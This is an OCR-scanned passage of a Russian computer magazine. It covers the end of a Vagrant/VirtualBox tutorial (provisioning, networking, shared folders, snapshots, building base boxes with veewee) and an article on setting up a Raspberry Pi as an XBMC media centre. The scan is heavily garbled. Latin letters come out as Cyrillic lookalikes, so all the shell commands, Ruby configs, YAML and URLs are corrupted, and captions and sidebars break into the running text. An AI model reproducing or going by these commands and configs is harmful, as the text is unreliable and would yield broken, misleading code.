цессора (у Іпіеі она называется Ехіепбесі Раде 
ТаЫез, а у АМО — Раріб ѴИиаІігаІіоп Іпбехіпд). 
С версии 4.2 виртуалбокс теперь ее тоже 
поддерживает. Поэтому владельцы Соге І5 
или АМО ВиІІсІогег после обновления должны 
заметить определенный прирост скорости 
работы виртуальной машины. 

Новые гостевые ОС 

Список официально поддерживаемых гостевых 
операционок теперь дополнился следующими 
наименованиями: 

• МасОБХМоипІаіпиоп 

• ѴѴіпсіоѵѵзв 

• ѴѴіпсіоѵѵб Бегѵег 2012 

• ІІЬипІи 12.04 (Ргесізе Рапдоііп) 

• Ресіога 1 7 

• Огасіе Упих 6.3 

Так что теперь все современные операционки 
без проблем должны работать внутри ѴВ. 



И пока несколько бестолкова, но ничего, дальше мы добавим ей 
функционала. 

РНОУІЗІОЫІМб 

Запуск пустой виртуальной машины (пусть даже и особым образом 
сконфигурированной) вряд ли может быть сильно полезен, поэтому 
в вагранте есть так называемые наполнители (ргоѵІБІопегз) — раз- 
личные способы настроить виртуальную машину не снаружи, а из- 
нутри. По сути, это возможность писать различные дополнительные 
сценарии, которые выполняются после создания виртуальной 
машины. Поскольку вагрант написан рубистами, то в качестве кон- 
фигураторов машины выбраны привычные им средства: СЬе( Боіо, 
СЬеІ Бегѵег, Рирреі Біапбаіопе, Рирреі Бегѵег и обыкновенный БЬеІІ. 
Средства Сбе* и Рирреі довольно известны и распространены и часто 
применяются для деплоя самых разных проектов, так что мы не будем 
заострять на нах внимание и рассмотрим самый простой вариант — 
зЬеІІ-скрипт. Создадим в текущей директории файл с именем 
іп5*аІІ_гесІІ5.5Ь и содержанием: 

5іісІо ар^-^еТ -ц -у Іп5*а11 гесІІБ-Бегѵег 

А в Ѵадгапі-файл добавим команды для наполнения: 

Ѵаегапі:: :Сопб§.гип сіо |сопб§| 
сопб§.ѵт.Ьох = и ргесІ5е64" 

сопб§. ѵт.ргоѵізіоп :5Ііе11, :раТН => "Іп5*а11_гес1і5 . біі" 
епсі 

Теперь переконфигурируем нашу машину командой: 

$ ѵа§гап1 геіоасі 

В результате на нашей виртуалке появится свежеустановлен- 
ный редис. 



СЕТЕВЫЕ НАСТРОЙКИ 

Конечно, одна из важнейших настроек виртуальной машины — 
конфигурация сетевых интерфейсов. За сетевые настройки отвеча- 
ет параметр сопКд.ѵт.пеІѵѵогк. Вагрант предлагает два варианта 
на выбор: работа в сети, ограниченной хост-машиной, или подклю- 
чение через сетевой мост. 

В первом случае мы явно задаем ІР машины, а также можем 
опционально указать маску сети (по умолчанию используется 
255.255.255.0). В таком случае конфиг приобретает вид: 

Ѵа§гапТ : :Сопб§. гип сіо |сопб§| 
сопб§.ѵт.Ьох = "ргесізебД" 

сопб§.ѵт.ргоѵіБІоп ізИеІІ, :ра!:Н => н іпБІа11_гесІІ5 . бН" 
епсі 

Во втором случае машина получает ІР по йНСР и становится пол- 
ноценным членом сети, в которой расположена и хост-машина. Если 
на хост-машине присутствует несколько сетевых интерфейсов, то мы 
можем указать, который именно использовать для моста. Для вывода 
списка имен сетевых интерфейсов воспользуемся командой: 

~$ ѴВохМапа§е ііб* ЬгісІ§есІі-р5 | §гер л №те 
Мате: епі: Іліі-Рі (АігРог*) 

Мате: еп0: ЕІЬегпеІ 

Мате: р2рѲ 

И, соответственно, конфигурация примет вид: 

Ѵа§гап1:: :Сопб§.гип сіо |сопб§| 
сопб§.ѵт.Ьох = "ргесі5еб4" 

сопб§. ѵт.ргоѵіБіоп :зІіе11, : ра1;И => "іп5*а11_гесІІ5.5ІѴ’ 
сопб§.ѵт.пе1:могк :ЬгісІ§есІ, :ЬгісІ§е => "епі: Мі-Рі 
(АігРог*)" 
епсі 
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Кроме того, Ѵадгапі позволяет также пробрасывать порты. Вот, 
например, такой ѴадгапІІіІе позволяет пробрасывать с 6379-го 
порта гостевой машины, на который по умолчанию вешается редис, 
на 8765-й на хост-машине. 

Ѵа§гап* : : Сопб§ . гип сіо |сопб§| 
сопбе-ѵт.Ьох = "ргесізе64" 

сопб§. ѵт. ргоѵізіоп :зЬе11, : ра1:И => И іп5І:а11_гес1І5. зЬ" 
сопб§. ѵт.-Рогыагс!_рог1: 6379, 8765 
епсі 

Какой вариант лучше — выбор за тобой, но в любом случае 
наша виртуалка уже вполне может выполнять роль сервера базы 
данных, на который можно зайти либо с хост-машины, либо с дру- 
гой виртуалки. 

НЕСКОЛЬКО ВИРТУАЛЬНЫХ МАШИН 

Кстати, в одном Ѵадгапі-файле можно объявить сразу несколько 
виртуальных машин с различными настройками. Как? Я думаю, 
следующий пример скажет сам за себя: 

Ѵа^гапі:: :Солб§. гип сіо |сопб§| 

сопЯ§. ѵт.сіебпе :меЬ сіо |меЬ_соп6§| 
іл/еЬ_соп6§.ѵт.Ьох = "меЬ" 
меЬ_сопб§. ѵт.ТогмагсІ_рогІ: 80, 8080 
епсі 

сопб§.ѵт.сІеЯпе : сІЬ сіо |ЬЬ_соп6е| 
сІЬ_сопй§. ѵт.Ьох = "сІЬ" 

ЬЬ_сопЯ§.ѵт.ТогмагсІ_рогІ: 3306, 3306 
епсі 
епсі 

Более того, запускать и пересоздавать виртуалки можно по от- 
дельности, добавляя имя машины после соответствующей команды: 

$ ѵа§гап1: ир иеЬ 
$ ѵа§гап* геіоасі сІЬ 

ОБЩИЕ ПАПКИ 

Еще одна интересная особенность ѴИиаІВох — общие папки, да- 
ющие возможность легко обмениваться файлами между гостевой 
и хост-машинами. Разумеется, Ѵадгапі предоставляет удобный 
способ настройки данной опции. Все, что нужно, — это немного 
поправить конфигурационный файл: 

Ѵа§гап* : : Соп6§ . гип сіо |соп6§| 

сопб§.ѵт.зЬаге_То1с1ег "сІаТа", "/сІаТа", "раТа" 
епсі 

Важно заметить также, что папки, использующие протокол МР5 
(Ыеіѵѵогк Рііе Бузіет), показывают лучшую производительность, 
нежели общие папки виртуалбокса. С другой стороны, ІЧР5 не под- 
держивается на хостах с Мпсіоѵѵз. Для того чтобы использовать 
МР5 вместо ѴігІиаІВох зЬагес! ІоИегз, необходимо это явно указать 
в настройках: 




ИНТЕРЕСНАЯ ФИЧА ѴВ — ОБЩИЕ 
ПАПКИ, ПОЗВОЛЯЮЩИЕ ЛЕГКО 
ОБМЕНИВАТЬСЯ ФАЙЛАМИ 
МЕЖДУ ГОСТЕМ И ХОСТОМ 




Также в ѴВ 4.2 значительно улучшился общий интерфейс работы с машинами 



Ѵа^гап*: :Соп6§.гип сіо |соп6е| 

соп6е.ѵт.5Ьа^е_То1сIе^( ,, с1а1:а ,, , "/сІаТа", "сІаТа", — 

:п-Рз => *гие) 
епсі 

СНЭПШОТЫ И ПЕСОЧНИЦА 

Поскольку Ѵадгапі предоставляет гибкий АРІ для расширения 
своего функционала, неудивительно, что существует немалое 
количество плагинов для Ѵадгапі, решающих самые различные 
задачи. На случай, если у тебя появятся новые идеи, какие новые 
возможности можно добавить в вагрант, — в документации есть 
специальный раздел, содержащий все необходимые настройки и 
примеры І ЬіМѵ/126іІбМ І. 

БАНАРА 

Плагин представляет собой песочницу для виртуальных машин: 
если что-то поломалось, можно легко и просто откатить до послед- 
него снэпшота. Плагин является руби-гемом (что вполне ожидаемо) 
и называется заЬага ( НЦрз://дііЬиЬ.сот/)ес1і4еѵег/5аЬага ). После 
его установки в вагранте появляется дополнительная команда — 
ѵадгапі запсІЬох. Типичный пример использования выглядит так. 
Включаем режим песочницы: 

$ ѵа§гапТ запсІЬох оп 

Производим определенные действия (работаем с файлами, меняем 
настройки и прочее): 

$ ѵа^гапі: ззЬ 

Если результат работы нас удовлетворил — сохраняем сделанные 
изменения: 

$ ѵа§гапТ запсІЬох соттіі: 

В противном случае откатываем неугодные правки: 

$ ѵа§гап1: запсІЬох гоІІЬаск 
И выходим из режима песочницы: 

$ ѵа§гап1: запсІЬох о-РТ 
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СОЗДАНИЕ БАЗОВЫХ СБОРОК 

Несмотря на то что сообщество уже позаботилось о наиболее 
распространенных образах операционных систем, тебе вполне 
может понадобиться иметь свою особенную сборку. Из соображе- 
ний безопасности (а вдруг хакер Вася добавил свою магию в одну 
из сборок, лежащих в Сети), необходимости каких-то особенных 
настроек или просто из интереса — неважно, главное, что та- 
кая возможность есть. И здесь нам поможет гем ѵееѵѵее ( Н»р5:// 
діЕЬиЬ.сот/іегіі4еѵег/ѵееѵѵее ). созданный специально для этих 
целей. 

Для начала установим его: 

$ §ет іпБІаІІ ѵееѵѵее 

Репозиторий ѵееѵѵее содержит большое количество шабло- 
нов: ЬЦр5://ді{НиЬ.сот/іегіі4еѵег/ѵееѵѵееЛгее/та5ІегЛетрІаІе5 . 

Выберем интересующий нас — пусть это будет последняя версия 
ІІЬипІи Бегѵег. Теперь создадим новую базовую сборку на основе 
этого шаблона: 

$ ѵееѵѵее ѵЬох сіебпе туиЬипІиЬох •-< 
"иЬип1:и-12.10-5егѵег-і386" 

В результате у нас появится новое «определение» бейс-бокса. 
В папке сІеКпіІіопз/туиЬипІиЬох содержатся файлы, описывающие 
нашу виртуальную машину: 

• сІеЯпіІіоп.гЬ; 

• розІіпзІаІІ.зН; 

• ргезеесі.сід. 

Немного поправим конфигурацию виртуалки: 

Ѵееѵѵее: :5еББІоп.гіес1аге({ 

:сри_соип* => ’1‘, :тетогу_5І2е=> '1024', 

:сІІ5к_5І2е => '10140', :с!і$к_-Рогта1: => ’ѴОІ', 
:Но5ТіосасИе => ’о-Р-Р’, 

: 05_1уре_ісІ => 'ІЯліпТи', 

:І50_Рі1е => ”иЬипТи-12.10-5егѵег-і386. 15о", 

:і50_$гс => "Ь1-Ср://ге1еа5е5.иЬип*и.сот/12.1Ѳ/^ 
иЬип*и-12. 10- Бегѵег- І386.І50", 

: ІБО_тс15 => ' ЬЗс14сІ4егі-Рс8-Р291аТ0Ь83-Р8а2Ьа19а2-Р ’ , 
:і$о_с1оѵѵп1оасІ_1:ітеоиТ => "1000", 

:Ьоо1:_ѵѵаі* => "4", 

:Ьоо*_стсІ_5еяиепсе => [ 

'<Е5схЕ5С><Еп*ег>', 

'/іпБІаІІ/ѵгаІіпиг поаріс ргезеесІ/иг1=«-> 

Ь«р: //%ІР%:%Р0КТ%/рге5еес1 . с-Р§ ', 
’сІеЬіап-іп5Іа11ег=еп_и5 аи*о 1оса1е=еп_ІІ5 ^ 
кЬсі-сНоо5ег/те*Ііосі=и5 
' Ио5І:пате=%ММЕ% ’ , 



УДОБНАЯ СРЕДА ПОЗВОЛЯЕТ 
СКОНЦЕНТРИРОВАТЬСЯ 
НА РЕШАЕМОЙ ПРОБЛЕМЕ, 

А НЕ НА ВОПРОСАХ 
СОВМЕСТИМОСТИ СОФТА ИЛИ 
РАЗЛИЧИЯХ ОС, И ЭТО ГЛАВНАЯ 
ФИШКА ѴА6КАЫТ 



’-РЬ=-РаІ5е сІеЬсоп-Р/-Ргоп1:епс1=попіп1:егас1:іѵе ', 

' кеуЬоагс!-сопРі§игаТіоп/тосІе1сосІе=5КІР 
кеуЬоагсІ-сопРі§ига1:іоп/1ауои1:=и5 кеуЬоагсІ-^ 
сопб§ига*іоп/ѵагіап1:=и5 соп$о1е-$е1:ир/^ 
а5к_сІе1:ес1:=-РаІ5е 

'іпіТг<1=/іп5Та11/іпіТг<1.§2 -- <Еп-Сег>' 

ь 

:кіск 5 ТагТ_рогТ => "7122", : кіскз*аг1:_Тітеои1: => 

"10000", :кіск5І:агС_Рі1е => "рге5еесІ.с-Р§", 
:55Іі_1о§іп_1:ітеои1: => "10000", :55Іі_и5ег => "ѵа§гап1:", ^ 
:55Ь_ра55ѵѵогсІ => "ѵа§гапТ", «-• 

: 55 Ь_кеу => :55Н_Но5І:_роП: => "7222", ^ 

: 55Ь_вие5Т_рогТ => "22", ♦-* 

: 5 исІо_стЦ => "есИо ' %р ' | зисіо -5 бИ '%-Р'", — 

: 5 Ни'СсІоѵѵп_стсІ => "бРшісіоѵѵп -Р поѵѵ", «-* 

:ро5Тіп5І:а11_б1е5 => [ "роБІіпБІаІІ.БН"], — 
:ро5І:іп5Та11_1:ітеои-1: => "100Ѳ0" 

}) 

Теперь запустим сборку командой 

$ ѵееѵѵее ѵЬох Ьиіісі туиЬип'СиЬох 

Ѵееѵѵее задумается на время, пока будет создавать виртуаль- 
ную машину, скачивать 150-образ операционной системы, а также 
устанавливать и настраивать ее. После того как команда закончит 
работу, проверим созданную виртуалку при помощи следующей 
команды: 

$ ѵееѵѵее ѵЬох ѵаІісІа-Се туиЬипІиЬох 

Если все прошло гладко, можно двигаться дальше. Проэкспор- 
тируем созданную виртуальную машину как файл базовой сборки 
ѵадгапі: 

$ ѵа§гап* ЬаБеЬох ехрог* туиЬипІиЬох 

Ну вот, собственно, и все. Теперь, чтобы использовать нашу 
базовую сборку, вызовем уже знакомые команды. Добавим бокс 
в список: 

$ ѵа§гап1: Ьох асИ туиЬипІиЬох туиЬип-СиЬох.Ьох 
И создадим новую виртуальную машину на основе уже созданной: 

$ ѵа^гапі іпі* туиЬипІиЬох 

Вот и все —теперь даже самые рьяные параноики не смогут нас 
осудить, ведь теперь весь техпроцесс создания виртуальной среды 
контролируется нами же. 

ЗАКЛЮЧЕНИЕ 

Удобная среда разработки позволяет больше сконцентриро- 
ваться на решаемой проблеме, а не на вопросах совместимости 
ПО или различиях операционных систем, и это главная фишка 
Ѵадгапі. С ним можно избавиться от проблем, когда на машине 
разработчика все работает, а на продакшене почему-то нет. 

Разумеется, на данный момент несколько смущает его силь- 
ная руби-ориентированность, но будем надеяться, что со време- 
нем разработчики решат и эту проблему, расширив, например, 
список провизоров на РуіЬоп или .Лаѵа. И кстати, в настоящее 
время идет работа по добавлению других систем виртуализации, 
кроме ѴігІиаІВох. 

В любом случае, уже сейчас проект представляет большой ин- 
терес как для отдельных разработчиков, так и для групп разработ- 
ки. Удачи и новых познаний! ІЕ 
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Илембитов (ІІетЬіІоѵОгеаІ.хакер.ги) 



ПОЛУЧАЕМ ^ 
ФУНКЦИОНАЛЬНЫЙ 
КОМПАКТНЫЙ 
И ТИХИЙ 
МЕДИАЦЕНТР 



ГОВОРИТ И ПОКАЗЫВАЕТ 




Последняя версия ХВМС 
получила официальную 
поддержку РазрЬеггу 
Рі, и для меня это стало 
хорошим поводом 
поделиться личным опытом 
использования этой машинки 
в качестве медиацентра. 
Думаю, что и ты останешься 
доволен, но для этого нужно 
рассмотреть несколько 
нюансов — в частности 
выбор аксессуаров 
и конкретного дистрибутива. 



рЬеггу Рі 



СУТЬ ПРОБЛЕМЫ 

Чтобы нафаршироватыелевизор мульти- 
медийным функционалом, есть несколько 
путей. Можно купить так называемый умный 
телевизор. Однако на сегодняшний день про- 
изводители просят за такие опции серьезные 
деньги, не предлагая при этом ничего поража- 
ющего сознание. Можно купить медиаплеер, 
но тогда столкнешься либо с какой-нибудь 
экзотичной прошивкой от производителя, либо 
с Апсігоісі, а приятного в этом мало. Кроме того, 
хотя флешкообразные Апсігоісі-компьютеры 
и стали относительно популярны, их качество 
не слишком высоко — особенно часто пользо- 
ватели жалуются на плохой ѴѴі-Рі и отсутствие 
ЕіНегпеІ (что для просмотра НЮ-контента 
недопустимо). Поэтому до сих пор энтузиасты 
предпочитали собирать собственный НТРС 
из тіпі-ІТХ-материнки и водружать на него 
ХВМС. Но ведь в жилую комнату хочется по- 



ставить что-то тихое и маленькое, не так ли? 
Вот тут на помощь и приходит РаврЬеггу Рі. 

Казалось бы, РРі разрабатывался как об- 
разовательный инструмент и игрушка 
для железячников — энтузиастов от мира ро- 
бототехники, при чем тут медиаплееры? Тем 
не менее многие используют малютку именно 
по такому назначению, и неспроста. В основе 
компьютера лежит чип Вгоасісот ВСМ2835, 
который изначально разрабатывался как ре- 
шение для мультимедиа (если не веришь, 
можешь почитать на сайте производителя: 
пс о.д /ѴВАаХ). По заявлениям создателей, 
мощность процессора невелика и находится 
на уровне Репііит II 300, но вот графический 
процессор удался — ты наверняка читал про 
то, как на РазрЬеггу играют в Оиаке 3. Произ- 
водитель сравнивает его мощность с первым 
ХЬох. В общем, не случайно точно такой же 
чипсет используется в популярном за рубе- 
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Говорит и показывает РазрЬеггу Рі 



Корпус 

для медиацентра 




жом плеере Роки и ряде других аналогичных 
продуктов. 

Видеочип поддерживает аппаратное 
декодирование Ь264, а также кодеки МРЕ6-2 
и ѴС-1. Правда, два последних кодека требуют 
платной лицензии, придется заплатить 170 
рублей. Неприятное упущение — отсутствует 
аппаратная поддержка аудиокодека йТБ (не- 
смотря на то что разработчики РазрЬеггу уже 
написали нужный код, договориться о лицен- 
зии пока не удается). Однако беглый поиск 
дает понять, что декодер йТБ в принципе 
редко встречается в маленьких плеерах. Если 
у тебя нет телевизора или ресивера, который 
мог бы выполнить декодирование сам, то чи- 
тай врезку. Спойлер: лучше все-таки искать 
контент с АСЗ. 

На этом плюшки не заканчиваются. 

У РазрЬеггу есть особенность, которой может 
позавидовать любой неттоп и подавляющее 
большинство медиаплееров, — это поддержка 
технологии СЕС (Сопзитег Еіесігопісз Сопігоі). 
Это спецификация для КШМІ, позволяющая ис- 
пользовать пульт телевизора для управления 
подключенными устройствами. Большинство 
телевизоров, выпущенных за последние пару 
лет, поддерживают эту технологию, но каждый 
производитель называет ее по-своему. В слу- 
чае моего РЬіІірз это ЕазуЫпк, у Батзипд — 
Апупе*+, у Бопу — ВРАѴІА Ыпк/Бупс и так 
далее. 

Помимо НОМІ, поддерживаются и аналого- 
вые выходы на видео и звук. Аналоговое видео 
вряд ли кому-то нужно в нашем контексте, 
а вот с аналоговым звуком пока ситуация 
неприятная. Дело в том, что из-за ошибок 
в прошивке на момент написания статьи 
качество звука отвратительно: например, в на- 
чале и конце каждого трека издается мощный 
щелчок (единственный выход — использовать 
даріезз-воспроизведение). 



Другой недостаток связан с реализа- 
цией 115В. Фактически на один контроллер 
в РаэрЬеггу повешено два порта и адаптер 
ЕіЬегпеІ. Поэтому медиаплеер не получится 
использовать для закачки торрентов — сеть 
будет постоянно воевать с диском в контроле 
за пропускной способностью, из-за чего все 
будет тормозить, и устройство не сможет ста- 
бильно качать на полной скорости. 

Тем не менее, как мы сейчас сможем 
увидеть, сообществу разработчиков удалось 
предложить что-то, с лихвой компенсирующее 
описанные недостатки. 

ЧТО ПОТРЕБУЕТСЯ 

Как известно, в комплекте РазрЬеггу Рі нет ни- 
чего, кроме самого компьютера, поэтому сразу 
стоит озвучить простой факт: наш медиа- 
плеер не будет стоить 35 долларов. Как ми- 
нимум потому, что следует учесть доставку. 
Между прочим, в Москве есть несколько 
интернет-магазинов, торгующих РазрЬеггу, — 
там он обойдется примерно в 2400 рублей, 



но зато получить можно в течение пары дней, 
а не нескольких недель. Кроме того, вместе 
с доставкой даже покупка у официальных дис- 
трибьюторов выльется, скорее всего, в близ- 
кие деньги, причем еще и с дополнительным 
геморроем (и немалым). В общем, рекомендую 
обратиться к услугам посредников — их легко 
найти в Яндекс. Маркете. 

Самый ответственный момент — выбор 
блока питания. РРі теоретически может ис- 
пользовать почти любой зарядник от смарт- 
фона или планшета с разъемом тісгоІІБВ, 
но на практике подойдет только адаптер 
на 5 вольт и хотя бы 1 ампер. Если адаптер 
не дает заявленного результата, РазрЬеггу 
будет работать нестабильно. Со списком про- 
тестированных пользователями адаптеров 
можно ознакомиться в полуофициальном вики 
(см. ссылку в сносках). Лично я использовал 
зарядник от смартфона НТС. 

Другой важный момент — карточка Бй. 

В принципе, моя карточка Тгапзсепсі 10-го 
класса на 32 гигабайта обошлась рублей 
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РазрЬеггу доступны все плагины ХВМС 



Здесь все самые важные настройки: разгон, сеть, ключи кодеков МРЕ62 и ѴС1 и многое другое 



в 800, что сравнительно недорого. Для нашего 
применения достаточно и 4 гигабайт, но вот 
брать более низкий класс не рекомендую — 
это скажется на отзывчивости интерфейса 
и общей производительности. Кроме того, 
стоит признать, что 50-карты не рассчитаны 
на такую нагрузку, поэтому лучше брать что-то 
от известного производителя. Впрочем, можно 
использовать в качестве основного раздела 
флешку, но для загрузки все равно понадобит- 
ся карточка. 

Также советую потратиться на корпус 
(у перекупщиков он обойдется рублей в 400). 
Конечно, так наш медиаплеер потеряет свой 
«гиковский» образ, но зато плата будет защи- 
щена. Как минимум нужно учесть, что при под- 
ключении-отключении кабелей и флешек 
вполне реально неудачно упереться пальцем 
в какой-нибудь участок голого РРі и что- 
нибудь там поломать. 

Еще нам понадобится некое хранилище 
файлов. Подключать жесткий диск, на мой 
взгляд, довольно бессмысленно. Во-первых, 
ВазрЬеггу, скорее всего, не сможет питать 
внешний хард по 115В и придется искать вари- 
ант с дополнительным источником питания. 
Во-вторых, как уже говорилось, РРі не сможет 
одновременно быть и медиаплеером, и торрен- 
токачалкой. Лучше всего подойдет любой ІЧА5. 
Воспользовавшись случаем, советую платфор- 
му КігкѵѵоосІ, которая шикарно работает под 
АгсЬЫпих, без всяких там оріѵѵаге. 

Дополнительные аксессуары. С пультом 
можно разобраться по-разному. Самое про- 
стое — использовать пульт от телевизора. 

Если по какой-то причине это не подходит, 
то можно купить специальный пульт для НТРС 
с У5В-приемником. Альтернативно можно 
соорудить ИК-приемник и подключить его 
к разъему СРЮ — это для любителей йІУ. 

Ну и наконец, самое функциональное реше- 
ние — поставить пульт на смартфон или план- 
шет. Для АпсІгоісІ доступен официальный пульт 
от ХВМС, а также просто отличный Уаізе [ доо. 
д!/9оРВІ) . С его помощью, например, можно 
посылать в ХВМС ссылки на УоиТиЬе и дру- 
гие популярные хостинги, выбирать файлы 
из медиатеки напрямую, а также пользоваться 
экранной клавиатурой. 



Отдельно стоит сказать про ѴѴі-Рі- 
адаптеры. Строго говоря, если ты собираешься 
смотреть 1080р, лучше использовать провод, 
так как ІІ5В-адаптеры обычно не тянут нужную 
скорость. Но если ты не настолько требова- 
телен или же тянуть кабель — не вариант, 
выбери любой из протестированных адаптеров 
(опять-таки не забудь глянуть в вики). Я ис- 
пользую ТР-ЫІМК И-ѴѴМ725М, который обо- 
шелся мне в 270 рублей и завелся совершенно 
без напильника. Для 720р такой адаптер 
вполне подойдет. 

Таким образом, моя конфигурация обо- 
шлась чуть меньше чем в 4 тысячи рублей. 

ВЫБОР ПЛАТФОРМЫ 

Есть три основных дистрибутива: РазрЬтс 
( ѵѵѵт.газрЬтс.сот ). ХВіап ( хЬіап.огд ) 

и ОрепЕІ_ЕС ( орепеіес.іѵ ). Принципиально 
отличается в данном случае последний — это 
традиционный дистрибутив для встраиваемых 
систем, поэтому работа с ним напоминает аль- 
тернативные прошивки для роутеров. Выбор 
дополнительного ПО ограничен, и ковыряться 
во внутренностях будет не очень комфор- 
тно. С другой стороны, это более стабильное 
решение. 

Выбор между РазрЬтс и ХВіап уже более 
сложный. Оба являются полноценными дис- 
трибутивами, оба имеют схожий функционал, 
но отличаются философией. РазрЬтс — ак- 
куратно собранный ХВМС поверх РазрЫап, 
из которого было выброшено все лишнее. 

ХВіап — проект, фокусирующийся на Ыеесііпд 
есіде, что приводит к модификации отдельных 
пакетов. Советую попробовать оба, но лично 
я выбрал РазрЬтс — более старый про- 
ект, к тому же использующий пакетную базу 
РазрЫап, поддерживаемую огромным сообще- 
ством. 

УСТАНОВКА И НАСТРОЙКА РА5РВМС 

Здесь все до боли прямолинейно. Для поль- 
зователей Мпсіоѵѵз доступен специальный 
установщик ( доо.дІ/2кд6р ). Пользователям *піх 
и 05 X доступен простой скрипт на РуіЬоп: 

сигі -О Н*Тр://5ѵп.5Тт1аЬ5.сот/5ѵпЛ-' 
га5рЬтс/Те5*іп§/іп5Та11ег5/руТНоп/«-і 



іпзТгаІІ.ру 

сЬтосі +х іпзТаІІ.ру 

При установке доступно несколько опций: 
можно выбрать установку на флешку (с за- 
грузочным разделом на карточке) и прописать 
настройки сети. На последнее стоит обратить 
внимание, если планируется использовать 
ѴѴі-Рі. Дело в том, что сама установка будет 
вестись полностью автономно: как только 
ты вставишь готовую карточку в РазрЬеггу 
и подключишь машинку к питанию, система 
подсоединится к серверу и начнет качать 
необходимые файлы и проводить первичную 
настройку. 

Примерно через двадцать минут ты полу- 
чишь готовую систему и стартовый экран 
ХВМС. При первом запуске система будет 
заметно подтормаживать — это нормально. 
Дело в том, что на этом этапе в фоне будут 
загружаться стандартные плагины. Поэтому 
я советую подождать еще минут пятнадцать, 
прежде чем предпринимать какие-то даль- 
нейшие шаги. И после этого начинается самое 
интересное. 

Немного поговорим о том, на что стоит об- 
ратить внимание в свежеустановленном ХВМС. 
По умолчанию в разделе приложений доступна 
утилита для выставления настроек, специфич- 
ных для РазрЬеггу, РазрЬтс БеПіпдз. Здесь 
выставляются настройки сети, параметры 
обновлений и многое другое. 

Стоит обратить внимание на параметры 
разгона процессора. Как известно, РРі можно 
разгонять до 1 гигагерца, и, по словам разра- 
ботчиков, это не навредит чипу. Однако работа 
карточки при этом может быть нестабильной, 
и при максимальном разгоне очень велика 
вероятность, что целостность данных будет 
нарушена и система просто перестанет загру- 
жаться. Придется все переустанавливать. Что- 
бы этого избежать, лучше использовать более 
щадящие режимы разгона либо устанавливать 
систему на флешку. 

В остальном — работа с ХВМС довольно 
очевидна. Процедуры установки плагинов, 
добавления файлов в библиотеки и выбора на- 
строек, думаю, описывать не стоит. Перейдем 
к более интересным вещам. 
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Говорит и показывает РазрЬеггу Рі 



ЛЕЗЕМ ПОД КАПОТ: НЕСКОЛЬКО ИНТЕРЕСНЫХ ТРЮКОВ ДЛЯ МЕДИАЦЕНТРА 



АІРРЦАУ В ХВМС 

АігРІау — это стандарт для потокового ве- 
щания аудио и видео на устройствах Арріе. 

В последней версии ХВМС была добавле- 
на начальная поддержка этой технологии, 
но по умолчанию она выключена. Чтобы вклю- 
чить ее, зайди в Бузіет -► Бегѵісез -► АігрІау. 
Теперь ты сможешь передавать таким образом 
музыку с яблочных устройств. Видео тоже ра- 
ботает, но крайне нестабильно. Пользователи 
Апсігоісі могут использовать для АігРІау плеер 
РоиЫеТѵѵізІ ( ооо.оІ/ХѵѵЬ8а 1. 



УБИРАЕМ НЕНУЖНОЕ 

Для последующих трюков потребуется вер- 
нуться в РазрЬгпс Беиіпдг и посмотреть раздел 
сервисов: Бузіет СопЛдигаЛоп -» Бегѵісе 
Мападетепі. 

Во-первых, нам понадобится сгоп. Во- 
вторых, в зависимости от твоей конфигурации 
сети можно отключить сервер БатЬа и РТР, 
хотя ресурсов это, конечно, много не высво- 
бодит. 

Далее подключимся к нашему медиацентру 
по 55Н. Логин — рі, пароль — газрЬеггу. 



ДОПОЛНИТЕЛЬНЫЕ 
ИСТОЧНИКИ ПЛАГИНОВ 

По умолчанию в ХВМС включен только один 
репозиторий. Чтобы добавить сторонний, 
как правило, нужно просто подсунуть соответ- 
ствующий файл. Например, есть репозиторий 
Берріиз, специализирующийся на аддонах для 
русскоязычного контента (различных видео- 
сервисов и приложений телеканалов), — его 
файл можно скачать тут: аоо.оІ/СаРѴО . Увы, 
качество многих аддонов невысоко, но что-то 
интересное найти можно. 



ВЕЕТ5 

Когда выводишь музыкальный плеер на боль- 
шой экран, корявые теги и отсутствие обложки 
начинают заметно раздражать. А прописывать 
их вручную — геморройно. Для таких случаев 
придуман Ьееіз — как называет его автор, 
инструмент организации аудиотеки для мани- 
акально одержимых аудиофилов. 

Установка проходит аналогично тому, 
что мы делали с РІехбеІ: 

зисіо ар1:-§е1: іпзіаіі руТЬоп-рір 
зисіо рір іпзіаіі ЬееТз 

После этого нужно провести начальную 
конфигурацию. Создадим нужные файлы: 

тксііг -р ~/.сопб§/Ьееіз 

ТоисН ~/.сопбе/ЬееТ5/сопбе.уат1 

тксііг -р ~/.аа*а/Ьее* 5 / 

іоисЬ ^/.сІаіа/Ьееіз/тизісІіЬгагу .ЬІЬ 

папо ~/ . сопб§/Ьее1:5/сопб§.уат1 

Базовый конфиг можно сделать, например, 
такой: 

сіігесіогу: /тесІіа/НО/Мизіс/ # путь до 
# медиатеки 

ІіЬгагу : ^/.сІаТа/Ьееіз/тизісІіЬгагу .ЬІЬ 
ітроП:: 

тоѵе: уез 
сору: по 

В таком случае Ьееіз будет записывать все 
изменения прямо в файлы, а не копировать 
файлы с новыми тегами в отдельную папку. 

За дальнейшими опциями проследуй в до- 
кументацию ( доо.дІ/ѴМ9Р5 І. Для того чтобы 
начать прописывать теги, можно вбить: 

Ьееі ітрогТ /тесІіа/НО/Мизіс/ 

По умолчанию процесс ручной. Система 
опрашивает МизісВгаіпг для каждого альбома, 
ранжирует варианты и предлагает их пользо- 
вателю. Поэтому запасись терпением и време- 
нем. Можно поизучать опции автоматизации, 
их очень и очень много. 



П.ЕХ6ЕТ 

Использовать РазрЬеггу при работающем 
ХВМС (да и вообще) для закачки торрен- 
тов — неблагодарное занятие. Тем не менее, 
если МАБ ставить не хочется, можно пойти 
на некоторые хитрости. РІехдеІ — это система, 
способная автоматизировать поиск торрен- 
тов, формировать очередь для Тгапзтіззіоп 
и делать все это по сгоп'у. Таким образом, 
запускать поиск серий можно в ночное время. 
Установка проста: 



зисіо арТ-ееТ іпзіаіі руіЬоп-рір 

зисіо рір іпзТаІІ Яех§еТ 

зисіо еазу_іпз1:а11 ігап5шІ55Іопгрс 



Про возможности РІехбеІ можно было бы 
написать огромную статью. С его помощью 
можно задавать любые параметры раздач, 
включая качество, размер, релиз-группу. 

Доступна интересная интеграция с ІМРВ: 
если занести фильм в список для просмотра 
(ѵѵаІсЫізІ) на сервисе, РІехОеі добавит его 
в свою очередь и пойдет искать при первой 
возможности. Заинтересовавшимся стоит 



обратить внимание на официальный соокЬоок 



ехоеІ.со т/ѵѵікі/СоокЬоокІ и примеры кон- 
фигураций ( ЛехдеІ.сот/ѵѵікі/СоокЬоок/Цзегя ). 

При желании систему можно постоянно рас- 
ширять дополнительными правилами, получая 
все более умную качалку. 



МРОгоііі — отличный 
клиент для МРб 
на АпсігоісІ, его 
